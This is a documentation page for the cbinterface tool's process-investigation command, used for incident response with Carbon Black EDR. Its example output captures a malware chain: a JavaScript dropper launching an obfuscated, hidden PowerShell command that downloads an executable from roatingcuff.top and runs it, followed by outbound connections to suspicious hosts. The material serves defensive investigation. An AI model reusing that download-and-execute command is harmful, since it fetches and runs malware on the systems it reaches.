ProcessInvestigation
Use the process inspection interface to carve and parse process events. You can use any combination of optional arguments together and these arguments are also applied to processes that recursively walked with the -w
(--walk-tree
) option.
NOTE: If you do not supply any optional arguments, the following inspection arguments are applied by default:
-i, --proc-info show process information
-t, --process-tree print the process tree with this process as the root.
-a, --process-ancestry
print the the process ancestry
-c, --show-children print process children event details
-nc, --netconns print network connections
-fm, --filemods print file modifications
-rm, --regmods print registry modifications
-ml, --modloads print modloads
-sl, --scriptloads print scriptloads (PSC)
-cp, --crossprocs print crossprocs
All process inspection arguments:
$ cbinterface i -h
usage: cbinterface investigate [-h] [-i] [-w] [-t] [-a] [-c] [-nc]
[-fm] [-rm] [-ml] [-sl] [-cp] [-rpe]
[--json]
process_guid_options
positional arguments:
process_guid_options the process GUID/segment to inspect. Segment is
optional.
optional arguments:
-h, --help show this help message and exit
-i, --proc-info show binary and process information
-w, --walk-tree Recursively walk, print, and inspect the process tree.
Specified arguments (ex. filemods) applied at every
process in tree. WARNING: can pull large datasets.
-t, --process-tree print the process tree with this process as the root.
-a, --process-ancestry
print the the process ancestry
-c, --show-children only print process children event details
-nc, --netconns print network connections
-fm, --filemods print file modifications
-rm, --regmods print registry modifications
-ml, --modloads print modloads
-sl, --scriptloads print scriptloads (PSC)
-cp, --crossprocs print crossprocs
-rpe, --raw-print-events
do not format Cb events onto a single line. Print them
the way Cb does by default.
--json Combine all results into json document and print the
result.
The Carbon Black Response product breaks process events up into process "segments".
You can specify that a single process segment is inspected by passing a process with the process.current_segment set to an existing process. This can be accomplished on the command line by passing the segment with the process GUID, like so:
cbinterface inspect 00006a99-0000-59ac-01d6-feff3879acfd/1612887600302
By default, if a single segment is not specified (current_segment field not set in the Process object) all segment events are inspected.
I used PSC for all of these examples but the commands are all interoperable.
cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -i
$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -a -t
------ Process Ancestry ------
2021-02-25 10:25:23.200000-0500: "C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js" | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
2021-02-23 08:47:52.351000-0500: C:\Windows\Explorer.EXE | 7W2FQEEY-02361dc7-00000fd0-00000000-1d709ea7b218d27
2021-02-23 08:47:52.228000-0500: C:\Windows\system32\userinit.exe | 7W2FQEEY-02361dc7-00001368-00000000-1d709ea7b0ec532
2021-02-23 08:47:16.322000-0500: winlogon.exe | 7W2FQEEY-02361dc7-000002dc-00000000-1d709ea65a7ff1d
------ Process Execution Tree ------
"C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js" | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','%temp%sDT76.exe'); & %temp%sDT76.exe & lKBAwPHfChLgeix | 7W2FQEEY-02361dc7-00000a20-00000000-1d70b8a6f8788d9
pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','C:\Users\NeoLite6\AppData\Local\TempsDT76.exe'); | 7W2FQEEY-02361dc7-0000219c-00000000-1d70b8a6f996b9c
C:\Users\NeoLite6\AppData\Local\TempsDT76.exe | 7W2FQEEY-02361dc7-0000208c-00000000-1d70b8a71e4dff5
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 7W2FQEEY-02361dc7-000004a4-00000000-1d70b8a6f8f5eea
Walk the process tree, printing network connections for every process, and grep
for outbound connections
$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -w -nc | grep outbound
@2021-02-25 10:25:24.772000-0500: Established outbound TCP from 10.0.2.15:58460 to 104.21.31.165:80 (roatingcuff.top)
@2021-02-25 10:25:27.616000-0500: Established outbound TCP from 10.0.2.15:58461 to 158.69.7.238:443 (aws.amazon.com)
@2021-02-25 10:25:29.323000-0500: Established outbound TCP from 10.0.2.15:58467 to 164.90.143.105:80 (hipporest.best)
- Home
- Configuration & Setup
-
Functionality
- CB Product Independent
- CBC/CB PSC Only
- CB Response Only
-
How-To & Examples
- Remediating Malware Infection
- Live Response
- Collect a File
- Kill a Process
- Collecting Browsing History
- Remediation Script
- Delete a File
- Containing Device
- Close LR Session
- Download Binary from CBC UBS
- Creating Playbooks
- Response to PSC Migration
- Search for Alerts on host
- Tune a Query based PSC Watchlist